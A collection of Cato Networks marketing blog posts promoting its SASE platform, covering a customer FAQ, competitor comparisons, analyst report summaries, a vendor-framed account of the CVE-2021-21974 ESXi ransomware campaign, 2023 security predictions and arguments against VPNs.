SASE is calling for vendor consolidation. Gartner, in its latest report "Market Guide for Single-Vendor SASE", has explicitly restated the need to unify all SASE capabilities into ideally one single vendor or at best into two vendors that must be fully integrated. We expect a limited list of vendors to stand out in the SASE market leadership and we expect companies to accelerate their initiatives towards network and security cloud-based services to reduce infrastructure complexity, optimize their CAPEX and OPEX and better control security across all their data, users and applications.
4. What techniques work best on informing senior leadership; assisting them with understanding, approving, and adopting a SASE technology?
When talking to senior leadership about the value of SASE, put the emphasis on the benefits that a SASE approach brings to companies in their digital transformation journey:
Simplicity - by reducing infrastructure complexity
Productivity - by providing an improved and consistent user experience
Efficiency - by reducing the overall infrastructure budget
Agility - shifting network and security skills from managing boxes to policies supporting the digital workplace
SASE Migration and adoption
5. What pre-requisites and steps are needed to transition successfully to a sustainable SASE?
Break down the organizational silos – network and security teams must work in concert in the name of speed, agility and reduction of complexity
Choose a SASE vendor that meets the SASE architectural requirements (cloud-native, converged, global & support for all edges)
Map future HW and SW refresh to the SASE vendor capabilities
Plan the transition project to start with low-risk areas to minimize friction
6. What components of SASE will be important in the SMB market now and in the next 5 years? ZTNA? CASB? SD-WAN? SMB?
Aside from the specific SASE features (which of course are important and depend on the specific business case), SMBs, probably more than any other organization, will look to adopt SASE solutions that provide the following characteristics and benefits:
These characteristics are typically delivered by cloud-native SASE vendors that offer an "As-a-Service" approach to networking and security.
7. Do you have a blueprint or reference architecture for an 80% cloud, 20% on-prem environment with multiple SaaS applications?
Regarding the 80/20 split, this is just marketing. Every enterprise is different, and so is every vendor. At Cato, we believe we should deliver as much as we can from the cloud and as little as we can from on-prem. Our 1500+ customers agree with us.
Cato SASE vs other SASE solutions
8. Which are the main benefits of the Cato SASE solution compared to a managed SASE offered by a Telco?
A Telco managed SASE service is normally a conglomeration of point solutions wrapped around a telco managed blanket. Some customers may consider this "black-box" approach but be wary of the following:
They can't move as fast as a modern digital business requires. Everything is managed through tickets, and involves multiple staff members due to the complexity of the underlying solutions architecture
They can't offer a future-proof solution. They are dependent on their vendors' roadmap, and usually are last to apply updates and enhancements due to the complexity and risk of downtime.
The bottom line is that, unless they manage a real SASE architecture underneath, they are simply not the right fit for the needs of modern, digital enterprises.
9. How is Cato SASE a better value than Netskope SASE?
Enterprises today are looking to consolidate services as much as possible realizing it will improve simplicity, agility, efficiency, and productivity. Netskope offers one point product (SWG+CASB) focused on internet and cloud security, another point product (NPA) focused on ZTNA, and they recently acquired a very small SD-WAN company (Infiot) for their SD-WAN technology.
While Cato and Netskope share the common vision of a SASE solution delivered as a Service from the cloud, the main difference is in the architecture design. While the Cato architecture has been built from the ground up with a converged approach with networking and security services delivered from a single home-grown software stack, Netskope started as a CASB/DLP solution and has later expanded its services portfolio by integrating multiple point solutions together because of several acquisitions, the last one being a small SDWAN provider called Infiot acquired in August 2022. Stitching point solutions together, even if done in the cloud, still poses questions on how these services can seamlessly scale and how much time it will take, for example, to get the SD-WAN technology fully integrated in the Netskope product suite, or to lift their FWaaS engine to an acceptable level to protect the East-West traffic.
In essence, whilst Netskope has a strong SSE proposition, their complete SASE offering is still not fully baked.
If you are looking for simplicity, agility, efficiency, and productivity today, and not in 2-3 years, Cato is the best solution.
10. What incentive would a business have to switch from Fortinet to SASE via Cato?
Improved productivity - Cato can help you optimize application performance and user experience. The Cato SASE Cloud has a global private backbone which minimizes the exposure of network traffic to the unpredictable and unreliable internet
Improved efficiency - By moving from on-premise appliances to a cloud-native solution, procurement, management, and maintenance costs are dramatically reduced. Team members are freed to focus on business needs and outcomes instead of maintenance and support.
Improved agility - Whether tomorrow’s need will be additional security capabilities, business expansion, cloud migration or a new balance between office and remote work, a cloud-native network and security infrastructure allows you to meet new business requirements much faster than appliance-based infrastructure that mandates complex planning, sizing, procurement, deployment, integration, and maintenance.
Cato SASE business value
11. How will SASE have an impact on our existing infrastructure?
SASE has many capabilities that can augment your existing infrastructure today and replace it tomorrow to make your infrastructure more agile, secure, and efficient. For example, you can use a global private backbone to augment SD-WAN with a reliable global transport. You can offload internet security from your resource-constrained on-prem firewalls to unlimited cloud-delivered security. You can also enable more users to work remotely without adding more VPN servers and without compromising on security or productivity.
12. Are you able to advise on any effort that Cato may have invested in reassuring potential Financial Service customers that the solution meets regulatory requirements?
Cato customers, including those from the financial services sector, all rely on us for their mission critical network and network security. To get their trust, we work continuously to make sure our enterprise network and our cloud service adhere to the highest security standards such as ISO, SOC, GDPR and others. Please see here for more details.
13. Are there any statistics or case studies that show typical cost savings achieved through migration from legacy networks and security to the Cato SASE solution?
Cato commissioned Forrester to run a survey across Cato Networks customers to quantify the benefits these customers have achieved in adopting the Cato SASE solution. The Total Economic Impact (TEI) report shows a stunning ROI of more than 240% when looking at the following benefits:
Reduced operation and maintenance
Reduced time to configure
Retired legacy systems (on-prem FW, SD-WAN)
The TEI document can be downloaded from here.
Cato SASE capabilities
14. Is it possible to implement the SASE architecture in countries such as: Spain, Italy, Colombia, Chile, Mexico and Venezuela?
If the SASE architecture is cloud-native, there are no limits to where it can be implemented. The implementation and availability are the responsibility of the SASE vendor. As a customer, you should focus on making sure there are SASE PoPs available within 25 ms round-trip time of your users, branches, and datacenters. Cato’s SASE backbone consists of more than 75 PoPs around the world with a presence on all five continents, including China. New PoPs are added on a quarterly basis to provide our customers with a guaranteed minimum latency. More information can be found here.
15. Is Cato able to connect to other Next-gen firewalls through an IPsec / VPN tunnel?
Cato allows third party devices to connect to the Cato SASE cloud by means of an IPsec tunnel. A potential use case could be to leverage an existing NGFW for East-West traffic in the local premises and use the Cato Cloud to provide secure internet connectivity and East-West traffic protection for geographical sites.
16. Is it possible to interconnect two components of SASE from different vendors (e.g., Cato SASE to Cisco Viptela SD-WAN)?
Cato allows third-party devices to connect to the Cato SASE cloud by means of an IPsec tunnel. Third-party SD-WAN devices will provide reliable connectivity to the Cato SASE cloud. Once the traffic lands in one of our PoPs, Cato handles security and middle-mile connectivity via the Cato private backbone.
17. How is security as a service, which is part of SASE, received by customers who have stringent compliance requirements like PCI-DSS / HIPAA etc.?
Organizations that are planning to migrate their network and security stack to the cloud must ensure they’re partnering with trusted providers who maintain the necessary levels of safeguarding and discipline of their own service security. The enterprise must evaluate the SASE vendor and make sure they adhere to the highest industry standards. Cato SASE services have received ISO27000, GDPR, SOC1, SOC2, SOC3 certifications. And with the Cato CASB solution, enterprises can configure their application control policies so that only applications which are compliant with PCI-DSS and/or HIPAA are authorized.
The Resurrection of CVE-2021-21974: The Ransomware Attack on VMware ESXi Hypervisors that Doesn’t Seem to Go Away
An old vulnerability has recently been making waves in the world of cybersecurity, and that is the catchily named CVE-2021-21974. The ransomware attack that exploits a vulnerability in VMware ESXi hypervisors has reportedly hit over 500 machines this past weekend. Shodan data indicates that many servers were initially hosted in the OVHcloud, but the blast radius appears to be constantly expanding.
So serious is the outbreak that it has gained the attention of CERT-FR (the French government center for monitoring, alerting and responding to computer attacks), which has issued an advisory warning of the vulnerability. This is the first advisory of 2023, only preceded by a Fortinet SSL-VPN issue which was announced in December 2022.
But the biggest problem is that the CVE was originally issued two years ago when researchers at Trend Micro discovered and reported the vulnerability to VMware! That’s two years where organizations didn’t patch and upgrade their servers to mitigate against this vulnerability.
Why is CVE-2021-21974 a concern?
The researchers discovered that vCenter Server, the centralized management platform for VMware, was susceptible to an attacker executing arbitrary code with privileged levels of access. The vCenter Server is the beating heart of a company’s virtual infrastructure. It’s the place where administrators go to manage virtual machines, networks, storage, and more.
By exploiting this vulnerability, an attacker could potentially gain access to sensitive information, disrupt operations, and cause significant damage to an organization's virtual infrastructure. While VMware took steps to address this exploit, it required manual intervention on behalf of administrators to install and deploy the fix.
How does this exploit work, and how can you stay protected?
This exploit follows the traditional hallmarks of the ransomware attack chain. Let’s walk through what that looks like for enterprises with and without Cato:
Step 1) Initial access
Legacy networks provide users with access to the complete network. As such, attackers have a wide range of attack vectors to gain initial access to the network and then to move laterally and attack the VMware vCenter Server. Vectors include phishing attacks, network intrusion, or exploitation of another vulnerability.
Cato implements a zero-trust access model, which restricts a user’s resource access and decreases the attack surface. It’s no longer sufficient for attackers to gain initial access to the network. They must gain access to a user or machine with access to vCenter Server. Cato’s ZTNA includes constant device and user assessment, user access control and posture checks to ensure that initial access is not possible. If someone attempts to click on a phishing link, Cato’s SWG and FWaaS can detect, block, and log this connection, ensuring that your perimeter always remains secure.
Step 2) Exploitation
The attacker exploits the vulnerability in the vCenter Server by sending a specially crafted request to the server. This request contains malicious code that the attacker wants to execute on the vCenter Server. Sometimes this is done via vulnerability chaining (using one vulnerability to expose another), while other times the attacker relies on a single exploit.
Should an attacker gain access to a machine with access to the vCenter Server, exploiting the vulnerability will still be impossible. Our security engines, including our IPS, identify and block the malicious code before the server can even be compromised. To be clear, even though the server has not yet been patched and, in theory, would be vulnerable, Cato mitigates the attack surface area without you having to do anything. And, yes, Cato does protect against CVE-2021-21974. We have for years.
Step 3) Code execution
Upon receiving the request, the vCenter Server processes it, which causes the malicious code to be executed on the server. This allows the attacker to execute arbitrary code with the privileges of the vCenter Server.
This phase is bypassed, as we have blocked the attacker from gaining access to the network, as well as blocking any malicious traffic. In the rogue event that a machine was compromised with ransomware while not being protected by Cato, our converged security solutions would prevent the lateral movement of malware throughout your network (north/south and east/west) while also providing an insight into this risk within the Cato Management Application.
Step 4) Data theft or disruption
The attacker can now access sensitive information stored on the vCenter Server or disrupt operations within the virtual infrastructure. The attacker could potentially steal sensitive information, disrupt virtual machines, deploy ransomware or even completely shut down the virtual infrastructure.
Information is secure as Cato has stopped every step of the attack lifecycle prior to this stage. However, if someone has compromised a device in a way that hasn’t been caught, Cato’s DLP capabilities will prevent exfiltration and theft of sensitive information.
What’s your choice?
This CVE is one of thousands which appear in the cybersecurity landscape every week, against hundreds of vendors. If you’re a network or security practitioner who’s responsible for managing a large stack of servers, which option would you choose to ensure your network doesn’t get breached?
Do you want to spend a large portion of your life chasing patches and securing vulnerabilities, deploying packages and making sure every hole of your leaking ship has been plugged?
Or should you adopt a converged stance for networking and security, and allow Cato Networks to protect you at each step of the attack cycle with minimal involvement required?
I know which option I would want....
To learn more about CVE-2021-21974 and other goodies, check out this episode of CyberTalk, our video series dedicated to raising cybersecurity awareness everywhere.
The Future of Network Security: Cybersecurity Predictions for 2023 & Beyond
With the increase in cloud adoption has come an expansion of the corporate digital attack surface. Cyber criminals are constantly evolving their tools and techniques, creating new threats, and pushing organizations to the brink.
As new trends emerge in both cyber attacks and defenses every year, we have decided to list our predictions for the top network security trends of 2023 and beyond.
#1. Zero Trust Becomes the Starting Point for Security
The goal of zero trust is to eliminate the main culprits of data breaches and other security incidents: implicit trust and excessive permissions. These play a major role in many cyberattacks as cyber criminals gain access to an organization’s network and systems, and expand that reach to exploit resources. Eliminating blind trust and limiting access to the least privileges necessary to maintain productivity makes this harder for an attacker to achieve.
Zero trust has gained more momentum in recent years and has become a realistic security focus. An effective zero trust strategy defines granular policies, enforces appropriate access permissions, and delivers more granular control of users on your network.
An effective Zero Trust strategy will protect organizations against many cyber threats, but it is far from a comprehensive solution. Ideally, companies will start with zero trust and then add additional controls to build a fully mature security program. Zero Trust is a journey, so having the right strategy will help smooth and expedite this journey, allowing it to move from a security goal to a security reality.
#2. Security Simplification Picks Up Steam
Every organization’s IT infrastructure and cybersecurity threat landscape is different; however, most companies will face similar challenges. Cyber criminals are more adept at targeting and exploiting weaknesses in networks and applications. SOC analysts suffer from alert overload due to high volumes of false positives. And the expansion of complex, multi-cloud environments introduces new security challenges and increased attack vectors.
Addressing these threats with an array of standalone products is an unproductive, unscalable and ineffective approach to network security. As a result, companies will increasingly adopt security platforms that offer a converged set of security capabilities in a single architecture, enabling security teams to more effectively secure and protect complex infrastructures.
#3. Faster Adoption of SASE
Digital Transformation is forcing corporate networks to more rapidly evolve away from the complex, inflexible architectures of the past. Cloud adoption, work from anywhere (WFA), BYOD policies, and mobile devices are all making the corporate networking environment more complex and challenging to manage, optimize, secure and scale. Additionally, legacy perimeter-based security architectures have become unsustainable, forcing organizations to decide between reliable network connectivity and complete in-depth security.
As a result, companies will more quickly adopt solutions designed specifically for these modern networks. Such modern networks require a converged, cloud-delivered architecture that is reliable and resilient and grows as their business grows. This can only be achieved with Secure Access Service Edge (SASE).
#4. Expansion of Targeted Ransomware Attacks
Ransomware has proven to be an extremely profitable enterprise for cyber criminals. The secret sauce of ransomware success is the in-depth research on attack targets: identifying the best attack vector, the most valued resources to attack, and the maximum amount a victim might be willing to pay. So, considering that some countries are already in recession and many organizations are pressing to optimize costs to remain profitable, cyber criminals will identify the weaker, more vulnerable targets and push them to the edge.
In recent years, we have seen healthcare, financial service, and more recently, manufacturing as prime targets for ransomware attacks. We expect to see these and more as attacks expand, exponentially, in 2023 and beyond.
#5. Growing Importance of API Security
Modern applications are designed around APIs, and as such, application security practices depend, tremendously, on API security practices. APIs are designed to allow other programs to automatically request or submit data or perform other actions.
The design of APIs makes them an ideal target for certain types of automated attacks such as credential stuffing, vulnerability scanning, distributed denial-of-service (DDoS) attacks, and others. As cybercriminals increasingly target these APIs, implementing defenses against API-specific attack vectors becomes more crucial for business success.
#6. IoT Will See More Cyberattacks
Internet of Things (IoT) devices are experiencing tremendous growth. The expansion of 5G networks provides fast, high-performance network connectivity, making it possible to deploy these devices everywhere. As these devices mature, they will increasingly be used to collect, process, and store sensitive business data.
However, these devices, while increasingly valuable to many organizations, are at high risk for attack or compromise. A huge threat to IoT devices is that they are always available, making them ideal targets for continuous attacks. Often, these devices have weak passwords, unpatched vulnerabilities, and other security issues. As they are increasingly deployed on corporate networks and entrusted with sensitive and valuable data, cyberattacks against them will continue to increase.
#7. Cyberattacks Will Increasingly Become Uninsurable
Cybersecurity insurance is one of the primary ways that organizations manage cybersecurity risk. For some it has also become their default cybersecurity strategy. When these companies suffer a ransomware attack, they expect their insurance provider to pay all costs, including the ransom and the costs of recovery and notifications.
However, the surge in expensive ransomware attacks has caused some insurance providers to explore options in their coverage schemes. This includes placing more requirements on customers to demonstrate improved cyber defenses and compliance with security standards as conditions for acquiring and maintaining an insurance policy. The end result may be limiting coverage parameters and, if attacks continue to grow more common and expensive (which they likely will), eliminating coverage altogether.
#8. Cyber Resilience Becomes an Executive Priority
Cybercriminals are increasingly moving toward attacks focused on business disruption. Ransomware attacks deny access to critical company resources. Other notable attacks render corporate systems inaccessible to legitimate users. As a result, companies are compromised as cybercriminals threaten their ability to operate and maintain profitability.
The growing threat of cyberattacks to the business will make cyber resilience a priority for C-level executives. If cyberattacks can bring down the business, investing in preventive solutions that can manage or mitigate these risks makes good strategic and financial sense.
What These Predictions Mean for Enterprises
In 2023, the evolution of the cybersecurity landscape will drive the evolution of corporate security platforms. Legacy security architectures will need to be replaced with solutions designed for the modern, more dynamic IT architecture and rapidly evolving cyber threats.
The Cato SASE Cloud and SSE 360 solutions helps companies implement security architectures that offer holistic, 360-degree protections against the latest cyber threats. To learn how Cato can help your organization improve its network performance and security, sign up for a demo today.
Cato SASE Cloud’s “Innovation” and “Platform Play” Earn “Leader” and “Outperformer” Status in GigaOm SD-WAN Radar Report
Today we announced that Cato Networks was named a “Leader” and “Outperformer” by GigaOm in the analyst firm’s Radar for SD-WAN Report. This is our first year to be included in the report and already we shot to the top of the leader’s circle, underscoring the strength and maturity of Cato SD-WAN and showing the importance of considering SD-WAN as part of a broader SASE offering.
The report evaluates 20 notable SD-WAN vendors, including Cisco, Fortinet, Versa Networks, Juniper, Palo Alto, VMware, and others. Of all these SD-WAN providers, Cato Networks is the only one rated as Exceptional in all the key criteria considered to be differentiators among the providers as well as the primary features for customers to consider as they compare solutions.
Figure 2: Only Cato scored “Exceptional” across every one of GigaOm’s Key Criteria
GigaOm: Cato’s SD-WAN Is “Easier to Maintain and Scale”
The report highlights Cato’s unique cloud-based approach to delivering SD-WAN as a real differentiator that makes a software-defined wide area network easier to maintain and scale for business needs.
“Cato SASE Cloud is a converged cloud-native, single-pass platform connecting end-to-end enterprise network resources within a secure global service managed via a single pane of glass,” says the report. “By moving processing into the cloud using thin edge Cato Sockets, Cato SASE Cloud is easier to maintain and scale than competitive solutions, with new capabilities instantly available. Leveraging an expanding global SLA-backed network of over 75 PoPs, Cato is the only SD-WAN vendor currently bundling a global private backbone with its SD-WAN. Moreover, Cato offers both a standalone SD-WAN solution and a security service edge solution – Cato SSE 360 – for securing third-party SD-WAN devices.”
Cato Is a Strong “Platform Play” with “Innovation”
The report places Cato as the only vendor with a strong “Platform Play” and “Innovation” in features. According to the report, “Positioning in the Platform Play quadrant indicates that the vendor has a fully integrated solution – usually built from the ground up – at the functional level.” The report additionally recognizes Cato as an Outperformer “based on the speed of innovation compared to the industry in general.” GigaOm calls Cato “a vendor to watch” for its innovation.
Read the GigaOm report for yourself to see why Cato SASE Cloud is the leader of the SD-WAN pack.
How SASE is Transforming the Manufacturing Industry
The manufacturing industry is constantly evolving. The revolution known as Industry 4.0 is introducing new technologies and innovations that are accelerating digitization and improving efficiency and productivity. One of these new technologies is SASE (Secure Access Service Edge).
What is SASE?
SASE is an enterprise networking and security category that converges network and security technologies into a single, cloud-native service. Converged functionalities include SD-WAN, Zero Trust Network Access (ZTNA), firewall-as-a-service (FWaaS), cloud-access security broker (CASB), DLP and secure web gateway (SWG).
SASE reduces the risk of cybersecurity breaches and enables global access to applications and systems. It also provides enterprises and plants with the ability to remove the cost and overhead incurred when maintaining complex and fragmented infrastructure made of point solutions. As a result, SASE is gaining momentum across multiple industries, including manufacturing.
How Manufacturers Benefit from SASE
Manufacturers can replace their legacy networking solutions, like MPLS, with SASE, to benefit from the capabilities SASE provides. Main benefits include:
Global connectivity: SASE provides the ability to securely connect tens of thousands of employees across dozens of plants around the globe to SaaS and on-premises applications. SASE can connect any network: the internet, MPLS, cellular networks and more.
Remote access: SASE supports the shift of workers to home offices by enabling a hybrid work environment.
Cloud connectivity: SASE enables users to access any production applications that migrated from on-prem to the cloud, while still supporting on-premises infrastructure.
Flexibility: SASE provides the infrastructure that enables producing innovative new products and reinventing outdated manufacturing processes.
Speed and performance: SASE enables manufacturers to increase bandwidth. Some manufacturers have been able to achieve 3x their previous WAN bandwidth.
Cost reduction: Some manufacturers have saved up to 30% annually by transitioning to SASE. In addition, SASE frees up employees to focus more on strategic projects that can benefit the business.
Smooth transition: SASE can be deployed quickly which makes the process nearly hassle-free.
Improved user experience and collaboration: SASE improves employee satisfaction and productivity by enhancing connectivity speed and performance.
Enhanced security: SASE enables faster detection, identification, response and remediation of cybersecurity incidents.
Spotlight: O-I Glass
O-I Glass, an Ohio-based glass bottle manufacturer, deployed Cato’s SASE Cloud solution as a replacement for their previous MPLS solution. By transitioning to SASE, O-I Glass was able to provide faster, more secure and higher performing access to their 25,000 employees spread across 70 plants in 19 countries. SASE also supports their employees’ secure connectivity when they work from home. The transition itself took six months and the estimated cost savings are 20% to 30% compared to their previous solutions.
By implementing SASE, O-I Glass was also able to deploy innovative methods for improving the manufacturing process. They introduced HoloLens, the Microsoft augmented reality/mixed reality system. These headsets are helping their engineers collaborate. When wearing them, engineers on different continents can see what the other is seeing, without requiring transatlantic flights. Before SASE, their infrastructure could not support such use. In addition, SASE supports their future plans for a modular glass production line as well as plans for plant maintenance and training.
To learn more about SASE and manufacturing, listen to the podcast episode “How to implement SASE in manufacturing: A discussion with PlayPower”.
The SSE RFP/RFI Template (or how to evaluate SSE Vendors)
Your SSE project is coming up. As an IT professional, you will soon need to organize the requirements for your enterprise's security transformation journey. To assist with this task, we’ve created a complimentary RFP template for your use. This template will help you ensure your current and future security threats are addressed and that your key business objectives are met.
The RFP template comprises four sections:
Business and IT overview: Your business, project objectives, geographies, network resources, security stack, and more.
Solution architecture: The architectural elements of the solution, how they operate, where they are situated, scaling abilities, failure resolution capabilities, and more.
Solution capabilities: The functionalities provided by the solution.
Support and services: The vendor’s support structure and available managed services.
You can find the complete template, with more details and guidance, here.
Please note, the template covers core SSE requirements alongside extended capabilities like FWaaS, NGAM, IPS and global private backbone. These additions will give you flexibility to expand into these projects in the future. So, let’s examine each one of these sections briefly.
Business and IT Overview
In this section, you will describe your company, including elements like your business and technical goals, other strategic IT projects you are managing, the project scope, your current security architecture and technologies, datacenters geographies, your cloud providers, and more.
This section is intended to provide the vendor context about your business. Therefore, it is recommended to elaborate as much as you can.
Solution Architecture
This section allows the vendor to describe the solution’s architecture and how its services are delivered. In addition, you will get answers to questions about the solution’s architecture strategy. For example, what is their approach to consolidating security capabilities? How are high availability and resiliency provided? How easy is it to scale? These are a few of the many questions this section will help answer.
Solution Capabilities
This section requires the vendor to describe their SSE security capabilities. These include SWG, ZTNA, CASB and DLP, and security management analytics and reporting. Additional requested information can include advanced threat prevention, threat detection and response, east-west security, policy management and enforcement, and non-web port traffic protection.
Support and Services
This section will enable you to understand the vendor’s support and managed services. You will get answers to support availability, SLAs, professional services and managed services options.
In addition to these four sections, the template also provides a fifth section about future expansion options. This forward-looking section helps you understand how easy it will be to transition to SASE, if required. From our experience, for many organizations this is the next step after basic SSE. This section will provide you with information about the migration process, configuration complexity, which technologies are required, and more.
How to Use the RFP Template
The RFP template can help you choose the right SSE vendor for your current and future network security needs. To review and start using the entire template, click here.
Gartner’s Market Guide to Single-Vendor SASE Offerings: The Closest Thing You’ll Get to a SASE Magic Quadrant
Ever since Secure Access Service Edge (SASE) was adopted by every significant networking provider and network security vendor, IT leaders have been waiting for a Gartner SASE Magic Quadrant.
And for good reason.
The industry has seen widely different approaches to what’s being marketed as SASE. Some companies partnered with each other to offer a joint solution with slightly integrated products. For example, Zscaler and any number of SD-WAN partners. Others simply rebranded their existing solutions as SASE. Think VMware SD-WAN (previously VeloCloud) turning into VMware SASE.
Market consolidation has brought together still other companies with disparate services requiring years’ worth of integration. As an example, consider HPE, Aruba and Silver Peak and the integration work ahead of them to make a cohesive SASE product. Meanwhile, we at Cato Networks chose a different path: to build a fully converged, global networking and security solution from the ground up. Gartner calls this “single-vendor SASE.”
A SASE Magic Quadrant would clear up the confusion in the industry and separate the leaders from losers. But while Gartner may not yet be ready to issue a SASE Magic Quadrant, the firm has issued the next best thing -- Market Guide for Single-Vendor SASE. The report takes a close look at the SASE market and specifically at single-vendor SASE.
The Single-Vendor SASE Market is Projected to Grow Substantially
Gartner defines a single-vendor SASE offering as one that delivers converged network and security as-a-service capabilities using a cloud-centric architecture. Cato is the prototypical single-vendor SASE leader. Example services that are part of a single-vendor SASE offering are SD-WAN, SWG, FWaaS, ZTNA, and CASB. All of those services, and this is key, are fully converged together in the underlying architecture, service delivery, and management interface. They truly are one cloud service, which is what separates single-vendor SASE from other approaches.
These converged services might also be the full roster of capabilities for the newest single-vendor SASE entries but they are only the starting point for Cato. In addition to those services, Cato also offers a global private backbone, data loss prevention (DLP), rapid CVE mitigation, managed threat detection and response, SaaS optimization, UC and UCaaS optimization, and a range of other capabilities.
According to Gartner, there should be rapid growth in single-vendor SASE implementation in the next few years. While only 10% of deployments were single-vendor SASE solutions last year, Gartner expects a third of all new SASE deployments by 2025 to be single-vendor. By the same timeframe, half the new SD-WAN purchases will be part of a single-vendor SASE offering.
The market’s growth is largely being driven by the desire for simplicity by reducing the number of deployed solutions and vendors. Of course, reducing complexity while still offering enterprise-class capabilities is something Cato has been delivering for years.
Cato Was Ahead of Its Time in This “Adolescent” Market
“A single-vendor SASE must own or directly control (OEM, not service chain with a partner) each of the capabilities in the core category,” according to the report authors. A “well-architected” solution must have all services fully integrated, a single unified management plane and a single security policy, a unified and scalable software-based architecture, and flexibility and ease of use. The report lists core functional requirements in each of the areas of secure web gateway, cloud access security broker, zero trust network access, and software-defined WAN.
Gartner points out that there are several vendors in the “adolescent” industry that meet the analyst firm’s minimum requirements. There are more, still, that come close but aren’t quite there with their offerings.
Because single-vendor SASE brings together networking and security into one solution with many functions, Gartner recommends that a joint team of network professionals and security experts be appointed to evaluate the solutions based on the organization’s foremost needs.
Single-Vendor SASE Has Lots of Benefits
The benefits of single-vendor SASE are many. Gartner cites the following as reasons to go this route for a SASE solution:
An improved security posture for the organization – This is based on reduced complexity of the various security functions, a single policy enforced everywhere, and a smaller attack surface.
Better use of network and security staff – Deployment times are reduced, fewer skills and resources are needed to manage a unified platform, a single policy is applied throughout the various security functions, and redundant activities go away.
Improved experiences for users and system administrators – Performance issues such as latency and jitter are easier to tame or eliminate, it’s easier to diagnose issues end-to-end, and there is a single repository for logs and other event data.
Of course, implementing such a solution can have its challenges as well, such as how to deal with organizational silos and what to do about existing IT investments. Global coverage can be an issue for the early-stage vendors. Fortunately, Cato has extensive coverage with 75+ PoPs around the world today. Gartner says solution maturity can be an issue, but that’s mainly a problem for the neophyte vendors. With more than 8 years in the single-vendor SASE business behind us, Cato is one of the most mature vendors in the market, if not the most mature.
Gartner Offers Recommendations
As with all Gartner guides, the research firm has recommendations pertaining to strategy and planning, evaluation, and deployment:
Establish a cross-functional team including people from both networking and security to increase the potential for a successful implementation.
Evaluate single-vendor SASE against the backdrop of multi-vendor and managed offerings to determine which method would provide the most flexibility.
“Choose single-vendor SASE offerings that provide single-pass scanning, single unified console and data lake covering all functions to improve user experience and staff efficacy.” (Spoiler alert: Cato provides all of these things.)
Do a Proof of Concept project with real locations and real users to see how well an offering can meet your needs. (Cato is happy to set you up with a PoC today.)
If you are looking for the most mature and feature-rich single-vendor SASE offering with the largest number of worldwide PoPs, look no further than Cato Networks. Request a demo at https://www.catonetworks.com/contact-us/.
Remote Access VPNs are a Short-Term Solution
The face of the modern corporate network is changing rapidly. Digital transformation initiatives, cloud adoption, remote work, and other factors all have a significant impact on where corporate IT assets are located and how corporate networks are used.
Companies looking to provide secure remote access to their off-site employees have largely chosen to expand their existing virtual private network (VPN) deployments. However, this is a short-term solution to the problems of the increasingly distributed enterprise. VPNs are ill-suited to meeting modern business needs and will only become less so in the future. It’s time for a change.
Secure Remote Access Has Become Business-Critical
Until a few years ago, most or all of an organization’s employees worked almost exclusively from the office. As a result, many corporate security infrastructures were perimeter-focused, working to protect employees and systems inside the office from external threats.
However, remote work has become normalized in recent years. Companies have been slowly shifting toward supporting remote work for some time now, and the pandemic accelerated this shift. Even as some companies try to pull workers back to the office, a higher percentage of employees are working remotely, at least part-time, than before the pandemic.
The ability to support remote work has become a critical capability for modern business. The popularity of remote work has made remote or hybrid work programs important for attracting and retaining talent. Additionally, a remote work program can also be a key component of a business continuity and disaster recovery (BC/DR) strategy as employees can work remotely in response to power or Internet outages, extreme weather, or public health crises.
A Remote Access VPN Doesn’t Meet the Needs of the Modern Enterprise
A central component of an organization’s remote work program is secure remote network access. Employees need to be able to access corporate networks, resources, and data without fear of eavesdropping or other cyber threats. Historically, many organizations have relied upon VPNs to provide secure remote access. VPNs provide an encrypted connection between two points, securing traffic between a remote user’s computer and the VPN server on the corporate network. The problem is, however, that VPNs don’t meet the business needs of the modern enterprise.
Some of their shortcomings include:
Lack of Scalability: In general, corporate VPN deployments were designed for occasional usage by a small percentage of an organization’s workforce. Continuous usage by a larger group — as many organizations experienced during the height of the pandemic — results in significantly degraded performance and can render VPN deployments unusable for employees.
Performance Degradation: VPNs are point-to-point solutions, meaning that they are often designed to connect remote employees to the headquarters network. With the growth of cloud computing and the distributed enterprise, this can result in inefficient network routing and increased latency.
Nothing but Basic Security: VPNs are designed solely to provide an encrypted connection between a remote employee and the headquarters network. They offer no access control or other security functions to ensure that the traffic they carry is benign or to implement zero-trust access controls.
VPNs are intended to allow employees to securely do their jobs from outside the office. Yet their limitations mean that they offer neither productivity nor security.
VPNs struggle to meet the needs of the modern enterprise, and corporate IT architectures and business needs are rapidly evolving. As a result, the impact of VPNs on business operations will only grow more pronounced in the future.
Some key business operations that will be inhibited by VPNs include:
Regulatory Compliance: Companies are subject to various regulations, and these regulations are periodically updated to reflect updates to the cyber threat landscape and available security solutions. When zero trust and more robust threat monitoring and prevention capabilities become required by law, VPNs will be unable to provide them.
Mobile Support: The use of mobile devices for business purposes has grown dramatically in recent years. VPN deployments designed for desktops and laptops often have lower usability and performance for mobile users.
Cyber Risk Management: The remote workforce is an easy target compared to applications secured behind advanced firewalls and threat prevention tools. Enterprises cannot rely on VPNs to secure remote users, and must apply measures to minimize risk and exposure to advanced attacks originating from remote users’ devices.
Moving Beyond the VPN
A remote access VPN is a thing of the past. It is a tool designed to implement a connectivity model that no longer works for the modern organization. While VPNs have significant limitations and challenges today, these issues will only be exacerbated over time as networks, threats, and compliance requirements evolve. Switching away from legacy technology today will improve an organization’s security posture in the future.
Secure Access Service Edge (SASE) and Security Service Edge (SSE) solutions with integrated zero trust network access (ZTNA) provide all of the secure remote access capabilities that VPNs lack. It is a solution designed for the modern, distributed enterprise that converges a full stack of enterprise network security capabilities. SASE/SSE offers all of the benefits of a VPN and more with none of the drawbacks. Learn more about how Cato SASE Cloud, the world’s first SASE platform, can help you modernize your organization’s secure remote access capabilities by signing up for a free demo today.
You’ll Need Zero Trust, But You Won’t Get It with a VPN
Properly implemented, a zero trust architecture provides much more granular and effective security than legacy security models. However, this is only true if a zero trust initiative is supported with the right tools. Legacy solutions, such as virtual private networks (VPNs), lack the capabilities necessary to implement a zero trust security strategy.
Zero Trust Security is the Future
Castle-and-moat security models were common in the past, but they are ineffective at protecting the modern network. Some of the primary limitations of perimeter-focused security models include:
Dissolving Perimeters: Legacy security models attempt to secure a perimeter that encapsulates all of an organization’s IT assets. However, with growing cloud adoption, this perimeter would need to enclose the entire Internet, making it ineffective for security.
Insider Threats: A perimeter-focused security model lacks visibility into anything inside of the corporate network perimeter. Insider threats — such as attackers that breach an organization’s defenses, supply chain vulnerabilities, and malicious users — are all invisible to perimeter-based defenses.
